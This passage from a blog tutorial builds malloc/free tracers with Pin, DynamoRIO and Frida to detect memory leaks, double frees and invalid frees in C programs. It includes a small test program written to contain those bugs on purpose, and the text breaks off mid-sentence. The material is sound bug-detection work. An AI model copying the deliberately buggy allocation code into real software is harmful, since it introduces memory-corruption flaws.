API the better it is. All the APIs allow us to, in a certain way, iterate over the instructions the DBI system is about to run. This allows us to add, remove, modify, or observe the instructions prior to execute them. For example, my initial idea was to simply log (observe) all the calls to memory related functions (malloc, and free). We can, not only introduce instructions to get profiling/tracing information about a program but also introduce complex changes to the point of completely replace certain instructions with a completely new implementation. Think for example, as replacing all the malloc calls with your own malloc implementation (that, for example, introduces shadow bytes and so on). In DynamoRIO it’s slightly different. However, in Pin most of the API routines are call based. This makes the API very user-friendly. At least to the way I think when I visualize the usage of a DBI system. This is also possible with DynamoRIO, obviously, as we will see. Basically, we register a callback to be notified when certain events occur (a call to malloc). For performance reasons, Pin inlines these callbacks. As we saw, most of the DBI frameworks support multiple operating systems, and platforms. Most of the time, the APIs are the same and all the differences between operating systems are kept away from the user and handled “under the table”. However, there are still certain APIs that are specific to certain operating systems. You need to be aware of that. It’s also important to distinguish between instrumentation and analysis code. Instrumentation code is applied to specific code locations, while analysis code is applied to events that occur at some point in the execution of the program. As stated on Wikipedia Instrumentation routines are called when code that has not yet been recompiled is about to be run, and enable the insertion of analysis routines. Analysis routines are called when the code associated with them is run. In other words, instrumentation routines define where to insert instrumentation. Analysis routines define what to do when the instrumentation is activated. The APIs of Pin, DynamoRIO, and Frida allow us to iterate over the target/guest program with a distinct level of granularities. That is, iterate over every single instruction, just before an instruction execute, entire basic blocks, traces (multiple basic blocks), or the entire target/guest program (image). Example tool As I mentioned, while I was playing with Heap Spraying I felt the need of logging all the memory allocations my code was performing. Since I felt a bit annoyed after doing this repeatedly with WinDbg, even with some automation, I thought about doing it with a DBI framework. More precisely, with Pin. I remember that during one of Peter Van Eeckhoutte’s exploitation classes he mentioned he had written something similar. I looked at his GitHub and found his Pintool. I had a look at his code, but since he used Visual Studio 2012, plus an old version of Pin, plus a different approach of what I had in mind, plus a different goal (I had in mind doing something else besides logging memory allocations), and things changed a bit since then… I decided to write my own Pintool instead of using, or modifying, his code. After all, it’s all about struggling and learning. Not running tools. Later I realized that most of his code comes from the Pin documentation, so does mine. The goal was to write a Pintool, or a DynamoRIO client, and use it to detect critical memory issues. Such as memory leaks and double frees. Yes, in C/C++ programs. You may say that there are plenty of tools that already allow you to do that, and that’s eventually true (in fact DynamoRIO comes with a couple of tools that can help here). The point here was to learn how to write my own tool, have fun, get familiar with DBI frameworks, and document my experiments for later reference. Eventually, it will also be used as a soft introduction to Dynamic Binary Analysis by people who don’t know where to start. So, the “critical memory issues” I had in mind weren’t really that difficult to trace. After looking at some almost ready to go code samples, I found in the Pin’s documentation, I ended up expanding a bit the initial logging goal I had in mind. And added a couple of “features” to aid my vulnerability discover capabilities. As you know, some common memory (de)allocation problems in C/C++ programs are: Memory leaks Double frees Invalid frees Use after frees. Note, I’m not detecting these at the moment. It’s tricky, even if it looks easy at first. I’ll add this feature at some point but it requires a bit more of engineering and testing. I assume everyone knows what the problems listed above are. If you don’t, or you need a ‘refresh’, just click the links above. At least the first 3 problems are very “easy” to detect with a Pintool, or a DynamoRIO client. I’ll do a couple of assumptions. The target program is a single binary/executable file, and the only functions that I’ll track to allocate and free memory are malloc and free (calloc, and realloc are just “special” versions of malloc anyway). Internally new and delete use malloc and free, so we are covered. I can simply “monitor” these calls. I won’t consider other functions like realloc, calloc, HeapAlloc, HeapFree, etc. (for now). Yes, for now, I’ll focus only on the generic malloc and free functions from the C Run-Time Library. In Windows, these functions when called will then call HeapAlloc and HeapFree. Here’s a diagram showing the relationship of Windows API calls used to allocate process memory (from the book The Art of Memory Forensics, and used with authorization. Thanks to Andrew Case). As we can see above, ideally we should actually be “monitoring” RtlAllocateHeap and RtlFreeHeap. However, we can ignore this for now. This way, if you just want to try this code in Linux, or OSX, its mostly copy and paste. Later, in the main version of this tool, I’ll indeed be only working with the Windows Heap functions or my Pintool won’t work with Internet Explorer, for example. Whenever a program calls malloc, I’ll log the return address (that is, the address of the allocated memory region). Whenever a program calls free, I’ll match its address being freed with the addresses I saved before. If it has been allocated and not freed, I’ll mark it as free. If it has been allocated and already freed, then we have a double free. If I don’t have that address saved has been allocated before, then we have a free of unallocated memory. Simple, huh? Finally, when the program exits, I can look at my records to detect memory addresses that have been allocated but not freed. This way I can also detect memory leaks. As we’ll see, using a dynamic binary framework to achieve what’s described above can be done with very little effort. However, there are some issues that we’ll ignore to keep this post simple. As you can eventually guess, the Heap Manager also plays a role here, and our tool might have to be Heap Manager specific if we don’t want to be flooded with false positives. Also, as mentioned before, this tool will tell us there’s a bug, but not exactly where. You can tell your tool to break/pause when an issue is found and attach a debugger. However, depending on the class of bug it may still be very hard to find where’s the bug and reproduce it. While I was writing this blog post, a very interesting tool from Joxean Koret called membugtool was released during the EuskalHack 2018 conference. His tool does a bit more than mine (well, actually considerable more), and the code is certainly better than mine. Keep following this post if you want to learn more about Pin and other DBI frameworks, but don’t forget to check his tool later. I was actually very happy when I saw it released because it means my idea wasn’t a complete nonsense. On top of that Joxean Koret is a respected researcher that I’ve been following for quite a long time, mainly due to his awesome work on breaking Antivirus engines. Target/Guest program (ExercisePin.exe) To test our multiple dynamic binary analysis tools, I wrote the following non-sense program (I called it ExercisePin.exe). It’s quite clear that there are some memory leaks, an invalid free, and a potential double-free (depending on our input). #include <stdio.h> #include <stdlib.h> void do_nothing() { int *xyz = (int*)malloc(2); } int main(int argc, char* argv[]) { free(NULL); do_nothing(); char *A = (char*)malloc(128 * sizeof(char)); char *B = (char*)malloc(128 * sizeof(char)); char *C = (char*)malloc(128 * sizeof(char)); free(A); free(C); if (argc != 2) do_nothing(); else free(C); puts("done"); return 0; } As you can see it’s a very stupid program, I recommend you to test your tools with real software and see how they behave. Also, check the previously mentioned project membugtool since it includes a very nice set of tests which actually made me lazy and I didn’t even try to improve the code above and create new sample buggy programs. Depending on which compiler you use to build this sample, you might have different results. I built mine with Visual Studio. It has advantages, and disadvantages. If you prefer you can use Dev-C++ (which uses GCC), or cygwin (and install gcc or i686-w64-mingw32-gcc.exe), or even Embarcadero. Anyway, expect different results depending on the compiler you choose to build the target program. Basic Pintool (MallocTracer) In this first Pintool example, I’m logging all the malloc and free calls. The instrumentation is added before and after the malloc call and logs the parameter passed to the call and its return value. For the free call we’ll only look at its parameter, and not at its return value. So the instrumentation is only added before the call. This Pintool will not be very useful in big applications since it doesn’t really tell you where the issue is. Anyway, it is a good start and will serve the purpose of “showing” how the Pin API can be used. We need to start by choosing which instrumentation granularity we’ll use. Have a look at the documentation for more details. I’ll be using Image instrumentation. Image instrumentation lets the Pintool inspect and instrument an entire image, IMG, when it is first loaded. A Pintool can walk the sections, SEC, of the image, the routines, RTN, of a section, and the instructions, INS of a routine. Instrumentation can be inserted so that it is executed before or after a routine is executed, or before or after an instruction is executed. Image instrumentation utilizes the IMG_AddInstrumentFunction API call. Image instrumentation depends on symbol information to determine routine boundaries hence PIN_InitSymbols must be called before PIN_Init. We start with some includes. To use the Pin API we need to include pin.h. #include "pin.h" #include <iostream> #include <fstream> #include <map> The iostream header is required for basic input/output operations, and the fstream header is required because I’ll write the output of my Pintool to a file. In small programs, we could live with the console output, however for big programs we need to save the output to a file. If you are instrumenting Internet Explorer for example and playing with some JavaScript code, the amount of malloc and free calls is impressive (well, RtlAllocateHeap, and RtlFreeHeap). In some big programs you might not even want to write to disk every time there’s a call due to performance reasons, but let’s ignore that to keep things simple. Additionally, I’ll use a map container to keep a log of all the memory allocated and freed. Check the References section to see how the C++ map container “works” if you aren’t used to writing code in C++. Since I’m not a developer, I’m not, so my code can be a bit scary but hopefully works. Consider yourself warned. I’ll also have some global variables. It’s very common to use global variables in a Pintool, have a look at the samples provided to get a feeling of how they are most commonly used. In my case, I’ll use the following global variables. map<ADDRINT, bool> MallocMap; ofstream LogFile; KNOB<string> LogFileName(KNOB_MODE_WRITEONCE, "pintool", "o", "memprofile.out", "Memory trace file name"); I already mentioned the map container above, again have a look here if you don’t know how it works. The idea is to store in this MallocMap the state of each allocation. The ADDRINT type is defined in pin.h, and as you can guess represents a memory address. It will be mapped to a BOOL value. If the BOOL value is set to true it means it has been deallocated. The LogFile is the output file where I’ll save the output of the Pintool. Lastly, the KNOB variable. It is basically a switch supported by our Pintool (a way to get command arguments to our Pintool. This KNOB allows us to specify the name of the log file through the “o” switch. Its default value is “memprofile.out”. If we look at the main function of the code samples, you’ll see that they are all very similar. And the one below is no exception. int main(int argc, char *argv[]) { PIN_InitSymbols(); PIN_Init(argc, argv); LogFile.open(LogFileName.Value().c_str()); IMG_AddInstrumentFunction(CustomInstrumentation, NULL); PIN_AddFiniFunction(FinalFunc, NULL); PIN_StartProgram(); return 0; } I have to call PIN_InitSymbols before PIN_Init because I’m using Image instrumentation, which depends on symbol information. Then I open the log file for writing, and I call IMG_AddInstrumentFunction. The instrumentation function that I’ll be using is called CustomInstrumentation and is defined by me (not a Pin API function). You can call it whatever you want. Then I have to call PIN_AddFiniFunction, which is a call to a function to be executed immediately before the application exits. In this case, my function is FinalFunc. Finally, I call PIN_StartProgram to start executing my program. This function never returns. So let’s have a look at my CustomInstrumentation() function. VOID CustomInstrumentation(IMG img, VOID *v) { for (SYM sym = IMG_RegsymHead(img); SYM_Valid(sym); sym = SYM_Next(sym)) { string undFuncName = PIN_UndecorateSymbolName(SYM_Name(sym), UNDECORATION_NAME_ONLY); if (undFuncName == "malloc") { RTN allocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym)); if (RTN_Valid(allocRtn)) { RTN_Open(allocRtn); // Record Malloc size RTN_InsertCall(allocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeMalloc, IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END); // Record Malloc return address RTN_InsertCall(allocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterMalloc, IARG_FUNCRET_EXITPOINT_VALUE, IARG_END); RTN_Close(allocRtn); } } else if (undFuncName == "free") { RTN freeRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym)); if (RTN_Valid(freeRtn)) { RTN_Open(freeRtn); RTN_InsertCall(freeRtn, IPOINT_BEFORE, (AFUNPTR)LogFree, IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END); RTN_Close(freeRtn); } } } } We need to “tell” Pin what are the instrumentation routines, and when to execute them. The instrumentation routine above is called every time an image is loaded, and then we also “tell” Pin where to insert the analysis routines. Basically, above, when we find a call to malloc or free we insert the analysis routines by using the RTN_InsertCall function. The RTN_InsertCall accepts multiple arguments, a variable number of arguments actually. Three are quite important, and you can easily guess which ones by looking at these calls. The first is the routine we want to instrument. The second is an IPOINT that determines where the analysis call is inserted relative to the instrumented object. And the third is the analysis routine to be inserted. Also, note that all RTN_InsertCall functions must be preceded by a call to RTN_Open and followed by a call to RTN_Close. We can specify a list of arguments to be passed to the analysis routine, and this list must be terminated with IARG_END. As we can also guess by looking at the code, to pass the return value of malloc to the analysis routine we use IARG_FUNCRET_EXITPOINT_VALUE. To pass the argument of the malloc or free calls to the analysis routine, we use IARG_FUNCARG_ENTRYPOINT_VALUE followed by the index of the argument. In our case, both are 0 (first and only argument). All the Pin functions that operate at the routine level start with RTN_. Have a look at the RTN Routine Object documentation here. Also, all the Pin functions that operate at the image level start with IMG_. Have a look at the IMG Image Object documentation here. The same applies to all the Pin functions that operate at the symbol level, they all (or almost all) start with SYM_. Have a look at the SYM Symbol Object documentation here. You might be thinking how Pin finds malloc and free. Pin will use whatever symbol information is available. Debug symbols from the target/guest program if available, PDB files if available, export tables, and dbghelp. There are two possible methods to instrument our functions. We can use RTN_FindByName, or alternatively handling name-mangling and multiple symbols (the method I used) as shown below. for (SYM sym = IMG_RegsymHead(img); SYM_Valid(sym); sym = SYM_Next(sym)) { string undFuncName = PIN_UndecorateSymbolName(SYM_Name(sym), UNDECORATION_NAME_ONLY); if (undFuncName == "malloc") // find the malloc function After we find the calls (malloc and free in our example) we want to instrument, we “tell” Pin which function must be called every time a malloc call is executed. // Record Malloc size RTN_InsertCall(allocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeMalloc, IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END); // Record Malloc return address RTN_InsertCall(allocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterMalloc, IARG_FUNCRET_EXITPOINT_VALUE, IARG_END); If we look at the code above, we have two calls to RTN_InsertCall. In the first, we “tell” Pin which function must be called before the malloc call. In the second we “tell” Pin which function must be called after the malloc call. We want to log the allocation sizes and the return value of the malloc call. So, we need both. For the free call, we are only interested in its parameter (the address of the memory to free). RTN_InsertCall(freeRtn, IPOINT_BEFORE, (AFUNPTR)LogFree, IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END); These three functions are very straightforward. First, before the malloc call we just want to save the size of the memory being allocated. VOID LogBeforeMalloc(ADDRINT size) { LogFile << "[*] malloc(" << dec << size << ")"; } After the malloc call, we just want to save the return address. However, as we can see below, we use the map container and by using an iterator we check if the chunk of memory is being allocated for the first time. If yes, we also log it. VOID LogAfterMalloc(ADDRINT addr) { if (addr == NULL) { cerr << "[-] Error: malloc() return value was NULL. Heap full!?!"; return; } map<ADDRINT, bool>::iterator it = MallocMap.find(addr); if (it != MallocMap.end()) { if (it->second) it->second = false; else cerr << "[-] Error: allocating memory not freed!?!" << endl; } else { MallocMap.insert(pair<ADDRINT, bool>(addr, false)); LogFile << "\t\t= 0x" << hex << addr << endl; } } Finally, when we free a chunk of memory we verify if that address was already freed to detect double frees. Plus, if we don’t know the address being freed then we are trying to free memory that wasn’t allocated before. Which can lead to undefined behavior? VOID LogFree(ADDRINT addr) { map<ADDRINT, bool>::iterator it = MallocMap.find(addr); if (it != MallocMap.end()) { if (it->second) LogFile << "[*] Memory at address 0x" << hex << addr << " has been freed more than once." << endl; // Double free else { it->second = true; // Mark it as freed LogFile << "[*] free(0x" << hex << addr << ")" << endl; } } else LogFile << "[*] Freeing unallocated memory at address 0x" << hex << addr << "." << endl; // Freeing unallocated memory } Lastly, we have the call to FinalFunc, which is executed just before the program ends. We basically verify if there’s memory that has been allocated but not freed, and we close our log file. The return of this function marks the end of the instrumentation. VOID FinalFunc(INT32 code, VOID *v) { for (pair<ADDRINT, bool> p : MallocMap) { if (!p.second) LogFile << "[*] Memory at address 0x" << hex << p.first << " allocated but not freed" << endl; } LogFile.close(); } Simple. The whole Pintool code is below. You can also get the whole Visual Studio project from GitHub here. // Built on top of https://software.intel.com/sites/default/files/managed/62/f4/cgo2013.pdf (slide 33) #include "pin.h" #include <iostream> #include <fstream> #include <map> map<ADDRINT, bool> MallocMap; ofstream LogFile; KNOB<string> LogFileName(KNOB_MODE_WRITEONCE, "pintool", "o", "memprofile.out", "Memory trace file name"); VOID LogAfterMalloc(ADDRINT addr) { if (addr == NULL) { cerr << "[-] Error: malloc() return value was NULL. Heap full!?!"; return; } map<ADDRINT, bool>::iterator it = MallocMap.find(addr); if (it != MallocMap.end()) { if (it->second) it->second = false; else cerr << "[-] Error: allocating memory not freed!?!" << endl; } else { MallocMap.insert(pair<ADDRINT, bool>(addr, false)); LogFile << "\t\t= 0x" << hex << addr << endl; } } VOID LogBeforeMalloc(ADDRINT size) { LogFile << "[*] malloc(" << dec << size << ")"; } VOID LogFree(ADDRINT addr) { map<ADDRINT, bool>::iterator it = MallocMap.find(addr); if (it != MallocMap.end()) { if (it->second) LogFile << "[*] Memory at address 0x" << hex << addr << " has been freed more than once." << endl; // Double free else { it->second = true; // Mark it as freed LogFile << "[*] free(0x" << hex << addr << ")" << endl; } } else LogFile << "[*] Freeing unallocated memory at address 0x" << hex << addr << "." << endl; } VOID CustomInstrumentation(IMG img, VOID *v) { for (SYM sym = IMG_RegsymHead(img); SYM_Valid(sym); sym = SYM_Next(sym)) { string undFuncName = PIN_UndecorateSymbolName(SYM_Name(sym), UNDECORATION_NAME_ONLY); if (undFuncName == "malloc") { RTN allocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym)); if (RTN_Valid(allocRtn)) { RTN_Open(allocRtn); // Record Malloc size RTN_InsertCall(allocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeMalloc, IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END); // Record Malloc return address RTN_InsertCall(allocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterMalloc, IARG_FUNCRET_EXITPOINT_VALUE, IARG_END); RTN_Close(allocRtn); } } else if (undFuncName == "free") { RTN freeRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym)); if (RTN_Valid(freeRtn)) { RTN_Open(freeRtn); RTN_InsertCall(freeRtn, IPOINT_BEFORE, (AFUNPTR)LogFree, IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END); RTN_Close(freeRtn); } } } } VOID FinalFunc(INT32 code, VOID *v) { for (pair<ADDRINT, bool> p : MallocMap) { if (!p.second) LogFile << "[*] Memory at address 0x" << hex << p.first << " allocated but not freed" << endl; } LogFile.close(); } int main(int argc, char *argv[]) { PIN_InitSymbols(); PIN_Init(argc, argv); LogFile.open(LogFileName.Value().c_str()); IMG_AddInstrumentFunction(CustomInstrumentation, NULL); PIN_AddFiniFunction(FinalFunc, NULL); PIN_StartProgram(); return 0; } If you run it against our ExercisePin.exe (see the section Target/Guest Program) binary. C:\pin>pin -t c:\pin\source\tools\MallocTracer\Release\MallocTracer.dll -- ExercisePin.exe done C:\pin>type memprofile.out [*] Freeing unallocated memory at address 0x0. [*] malloc(2) = 0x564f68 [*] malloc(128) = 0x569b88 [*] malloc(128) = 0x569c10 [*] malloc(128) = 0x569c98 [*] free(0x569b88) [*] free(0x569c98) [*] malloc(2) = 0x564e78 [*] Memory at address 0x564e78 allocated but not freed [*] Memory at address 0x564f68 allocated but not freed [*] Memory at address 0x569c10 allocated but not freed Or, if we pass any data as an argument to our ExercisePin.exe… C:\pin>pin.exe -t "C:\pin\source\tools\MallocTracer\Release\MallocTracer.dll" -- C:\TARGET\ExercisePin.exe moo C:\pin>type memprofile.out [*] Freeing unallocated memory at address 0x0. [*] malloc(2) = 0x214f78 [*] malloc(128) = 0x218f98 [*] malloc(128) = 0x219020 [*] malloc(128) = 0x2190a8 [*] free(0x218f98) [*] free(0x2190a8) [*] Memory at address 0x2190a8 has been freed more than once (Double Free). As we can see above, our Pintool was able to identify all the issues we were aware of in our test case. That is, invalid free, memory leaks, and a double free. The reason why we don’t see the memory leaks in the last output, it’s because our binary crashes when the double free happens. The binary was built with Visual Studio, which adds some Heap integrity checks and makes it crash. If you build ExercisePin.exe with gcc, or another compiler, the double free won’t be noticed and the program will keep running. However, if you build it with gcc, for example, you’ll see many other malloc and free calls from the C Run-Time Library initialization code. Hence, I didn’t use gcc to make it easier to follow. Basic DynamoRIO client (MallocWrap) We’ll create a DynamoRIO client that mimics the Pintool above. That is, we’ll log all the malloc and free calls. The same way, the instrumentation is added before and after the malloc call since we want to log the parameter passed to the call and its return value. For the free call, we’ll only look at its parameter, and not at its return value. So the instrumentation is only added before the call. We’ll use the drwrap DynamoRIO extension, which provides function wrapping and replacing support, drwrap uses the drmgr extension to ensure its events occur at the proper order. We start with some “standard” includes, and to use the DynamoRIO APIs we need to include dr_api.h. #include "stdafx.h" #include <fstream> #include "dr_api.h" #include "drmgr.h" #include "drwrap.h" using namespace std; Additionally, we include the headers for the extensions mentioned above. That is, drmgr.h and drwrap.h. We’ll write the output of this DynamoRIO client to a text file, hence the fstream include. I won’t use a container in this example to keep track of the memory allocations. You can just copy and paste that functionality from the Pintool above with slight modifications, so I’ll leave that for you as an exercise. In this example, we’ll simply log malloc and free calls to demonstrate how to use the DynamoRIO API to accomplish the same as before, where we used Pin. Then, we have the functions’ declaration, and some global variables. static void event_exit(void); static void wrap_malloc_pre(void *wrapcxt, OUT void **user_data); static void wrap_malloc_post(void *wrapcxt, void *user_data); static void wrap_free_pre(void *wrapcxt, OUT void **user_data); ofstream LogFile; #define MALLOC_ROUTINE_NAME "malloc" #define FREE_ROUTINE_NAME "free" These are all cosmetic, we could have used these #defines in our Pintool too. We didn’t, the reason being is… we don’t have to. Feel free to adopt the style you want. I built this example on top of this one, so I ended up using more or less the same “style”. If you plan to port your client or Pintool to other platforms, this can be considered a good practice because it will make the changes easier. Next, we have a function called module_load_event, which his a callback function registered by the drmgr_register_module_load_event. DynamoRIO will call this function whenever the application loads a module. As you can see, not that different from Pin. static void module_load_event(void *drcontext, const module_data_t *mod, bool loaded) { app_pc towrap = (app_pc)dr_get_proc_address(mod->handle, MALLOC_ROUTINE_NAME); if (towrap != NULL) { bool ok = drwrap_wrap(towrap, wrap_malloc_pre, wrap_malloc_post); if (!ok) { dr_fprintf(STDERR, "[-] Could not wrap 'malloc': already wrapped?\n"); DR_ASSERT(ok); } } towrap = (app_pc)dr_get_proc_address(mod->handle, FREE_ROUTINE_NAME); if (towrap != NULL) { bool ok = drwrap_wrap(towrap, wrap_free_pre, NULL); if (!ok) { dr_fprintf(STDERR, "[-] Could not wrap 'free': already wrapped?\n"); DR_ASSERT(ok); } } } As we can see above, we then use dr_get_proc_address to get the entry point of malloc. If it doesn’t return NULL (on failure), then we use drwrap_wrap to wrap the application function by calling wrap_malloc_pre() prior to every invocation of the original function (malloc) and calling wrap_malloc_post() after every invocation of the original function (malloc). Again, conceptually, very close to what we did with Pin. We do the same with free. However, as stated before we are only interested in the free parameter and not its return value. So we only wrap the free call prior to every invocation (wrap_free_pre). Since we don’t care about its return value we just pass NULL as the third parameter to drwrap_wrap. With drwrap_wrap one of the callbacks can be NULL, but not both. We then have the dr_client_main, which is, let’s say, our main function. DynamoRIO looks up dr_client_main in each client library and calls that function when the process starts. We have a pretty common “main”, with calls to dr_set_client_name (which sets information presented to users in diagnostic messages), dr_log (which simply writes to DynamoRIO’s log file), and a couple of functions that you can guess what they do by its name. Additionally, drmgr_init, and drwrap_init, initialize the respective extensions. The dr_register_exit_event is pretty much the same as the Pin PIN_AddFiniFunction, which is a call to a function to be executed immediately before the application exits. Lastly, we have the call to drmgr_register_module_load_event that we already mentioned above. DR_EXPORT void dr_client_main(client_id_t id, int argc, const char *argv[]) { LogFile.open("memprofile.out"); dr_set_client_name("DynamoRIO Sample Client 'wrap'", "http://dynamorio.org/issues"); dr_log(NULL, LOG_ALL, 1, "Client 'wrap' initializing\n"); if (dr_is_notify_on()) { dr_enable_console_printing(); dr_fprintf(STDERR, "[*] Client wrap is running\n"); } drmgr_init(); drwrap_init(); dr_register_exit_event(event_exit); drmgr_register_module_load_event(module_load_event); } The function to be executed immediately before the application exits. Nothing special here. static void event_exit(void) { drwrap_exit(); drmgr_exit(); } And lastly, the callback functions already mentioned before. What’s relevant here? The call drwrap_get_arg, that as we can guess “Returns the value of the arg-th argument (0-based) to the wrapped function represented by wrapcxt. Assumes the regular C calling convention (i.e., no fastcall). May only be called from a drwrap_wrap pre-function callback. To access argument values in a post-function callback, store them in the user_data parameter passed between the pre and post functions.”. And the call drwrap_get_retval, which obviously returns the return value of the wrapped function. static void wrap_malloc_pre(void *wrapcxt, OUT void **user_data) { /* malloc(size) or HeapAlloc(heap, flags, size) */ //size_t sz = (size_t)drwrap_get_arg(wrapcxt, 2); // HeapAlloc size_t sz = (size_t)drwrap_get_arg(wrapcxt, 0); // malloc LogFile << "[*] malloc(" << dec << sz << ")"; // log the malloc size } static void wrap_malloc_post(void *wrapcxt, void *user_data) { int actual_read = (int)(ptr_int_t)drwrap_get_retval(wrapcxt); LogFile << "\t\t= 0x" << hex << actual_read << endl; } static void wrap_free_pre(void *wrapcxt, OUT void **user_data) { int addr = (int)drwrap_get_arg(wrapcxt, 0); LogFile << "[*] free(0x" << hex << addr << ")" << endl; } Very simple, and not that different from what we have seen before with Pin. The whole DynamoRIO client code is below. You can also get the whole Visual Studio project from GitHub here. #include "stdafx.h" #include <fstream> #include "dr_api.h" #include "drmgr.h" #include "drwrap.h" using namespace std; static void event_exit(void); static void wrap_malloc_pre(void *wrapcxt, OUT void **user_data); static void wrap_malloc_post(void *wrapcxt, void *user_data); static void wrap_free_pre(void *wrapcxt, OUT void **user_data); ofstream LogFile; #define MALLOC_ROUTINE_NAME "malloc" #define FREE_ROUTINE_NAME "free" static void module_load_event(void *drcontext, const module_data_t *mod, bool loaded) { app_pc towrap = (app_pc)dr_get_proc_address(mod->handle, MALLOC_ROUTINE_NAME); if (towrap != NULL) { bool ok = drwrap_wrap(towrap, wrap_malloc_pre, wrap_malloc_post); if (!ok) { dr_fprintf(STDERR, "[-] Could not wrap 'malloc': already wrapped?\n"); DR_ASSERT(ok); } } towrap = (app_pc)dr_get_proc_address(mod->handle, FREE_ROUTINE_NAME); if (towrap != NULL) { bool ok = drwrap_wrap(towrap, wrap_free_pre, NULL); if (!ok) { dr_fprintf(STDERR, "[-] Could not wrap 'free': already wrapped?\n"); DR_ASSERT(ok); } } } DR_EXPORT void dr_client_main(client_id_t id, int argc, const char *argv[]) { LogFile.open("memprofile.out"); dr_set_client_name("DynamoRIO Sample Client 'wrap'", "http://dynamorio.org/issues"); dr_log(NULL, LOG_ALL, 1, "Client 'wrap' initializing\n"); if (dr_is_notify_on()) { dr_enable_console_printing(); dr_fprintf(STDERR, "[*] Client wrap is running\n"); } drmgr_init(); drwrap_init(); dr_register_exit_event(event_exit); drmgr_register_module_load_event(module_load_event); } static void event_exit(void) { drwrap_exit(); drmgr_exit(); } static void wrap_malloc_pre(void *wrapcxt, OUT void **user_data) { /* malloc(size) or HeapAlloc(heap, flags, size) */ //size_t sz = (size_t)drwrap_get_arg(wrapcxt, 2); // HeapAlloc size_t sz = (size_t)drwrap_get_arg(wrapcxt, 0); // malloc LogFile << "[*] malloc(" << dec << sz << ")"; // log the malloc size } static void wrap_malloc_post(void *wrapcxt, void *user_data) { int actual_read = (int)(ptr_int_t)drwrap_get_retval(wrapcxt); LogFile << "\t\t= 0x" << hex << actual_read << endl; } static void wrap_free_pre(void *wrapcxt, OUT void **user_data) { int addr = (int)drwrap_get_arg(wrapcxt, 0); LogFile << "[*] free(0x" << hex << addr << ")" << endl; } If you run it against our ExercisePin.exe (see the section Target/Guest Program) binary. C:\dynamorio\bin32>drrun.exe -client "C:\Users\bob\Desktop\WRKDIR\MallocWrap\Release\MallocWrap.dll" 0 "" c:\Users\bob\Desktop\ExercisePin.exe [*] Client wrap is running done C:\dynamorio\bin32>type memprofile.out [*] free(0x0) [*] malloc(2) = 0x5a35d0 [*] malloc(128) = 0x5a9c50 [*] malloc(128) = 0x5a9cd8 [*] malloc(128) = 0x5a9d60 [*] free(0x5a9c50) [*] free(0x5a9d60) [*] malloc(2) = 0x5a34e0 We can extend this program to get the exact same functionality as our Pintool and check for memory corruption bugs instead of logging the calls only. I’ll leave that as an exercise for you. Basic Frida script (MallocLogger) Frida is a fast-growing DBI framework, mainly used in mobile devices. I haven’t played much with mobile applications in a long time (it’s about to change though), still, I wanted to give Frida a try because I heard good things about it, and it also supports Windows. The interesting part here is that Frida injects a JavaScript interpreter in the target/guest program. So, instead of writing C code, we’ll be writing JavaScript to instrument our program (actually, if we want we can also use C or Swift). You can see this as an advantage, or disadvantage. If you are a vulnerability hunter, and you like to poke around browsers then this should be an advantage, I guess. It’s actually very interesting that we are writing instrumentation code to manipulate low-level instructions by using a high-level language. You can find the JavaScript API here. Anyway, the use case will be exactly the same as the ones we saw before. While the instrumentation code has to be written in JavaScript (well, again, that’s not true but let’s use JavaScript because it’s cool), the resulting tools can be written in either Python or JavaScript. We’ll use Frida’s Interceptor to trace all malloc and free calls for a start. The target will be our ExercisePin.exe binary again. We’ll also try to create an output close to the one of our basic MallocTracer Pintool, and MallocWrap DynamoRIO client. Which means we’ll log the amount of memory requested, the return address of malloc and the argument of free. Here’s the sample MallocLogger.py Python script. #!/usr/bin/env python import frida import sys pid = frida.spawn(['ExercisePin.exe']) session = frida.attach(pid) contents = open('mallocLogger.js').read() script = session.create_script(contents) script.load() frida.resume(pid) sys.stdin.read() And below is the instrumentation JavaScript file, MallocLogger.js. // Interceptor for 'malloc' Interceptor.attach(Module.findExportByName(null, 'malloc'), { // Log before malloc onEnter: function (args) { console.log("malloc(" + args[0].toInt32() + ")"); }, // Log after malloc onLeave: function (retval) { console.log("\t\t= 0x" + retval.toString(16)); } }); // Interceptor for 'free' Interceptor.attach(Module.findExportByName(null, 'free'), { onEnter: function (args) { console.log("free(0x" + args[0].toString(16) + ")"); } }); If we run this Python script we get something like. C:\Users\bob\Desktop\frida>python MallocLogger.py free(0x0) malloc(2) = 0x984268 malloc(128) = 0x9856d8 malloc(128) = 0x985760 malloc(128) = 0x9857e8 done free(0x9856d8) free(0x9857e8) malloc(2) = 0x984278 Interestingly enough, Frida also comes with an utility frida-trace.exe that pretty much allows us to do the exact same thing we did above without writing almost any code (besides adding a bit more of information and tweaking the output). C:\Users\bob\Desktop\frida>frida-trace -i malloc -i free .\ExercisePin.exe Instrumenting functions... malloc: Auto-generated handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\msvcrt.dll\malloc.js" malloc: Auto-generated handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\ucrtbase.DLL\malloc.js" free: Auto-generated handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\msvcrt.dll\free.js" free: Auto-generated handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\ucrtbase.DLL\free.js" Started tracing 4 functions. Press Ctrl+C to stop. done /* TID 0x1f84 */ 125 ms free() 125 ms malloc() 125 ms malloc() 125 ms malloc() 125 ms malloc() 125 ms free() 125 ms free() 125 ms malloc() Process terminated If you look at the output above you can see that some JavaScript handlers were auto-generated. We can just tweak this JavaScript code to make the output look as before. If we open for example the file __handlers__\msvcrt.dll\malloc.js we’ll see something like: /* * Auto-generated by Frida. Please modify to match the signature of malloc. * This stub is currently auto-generated from manpages when available. * * For full API 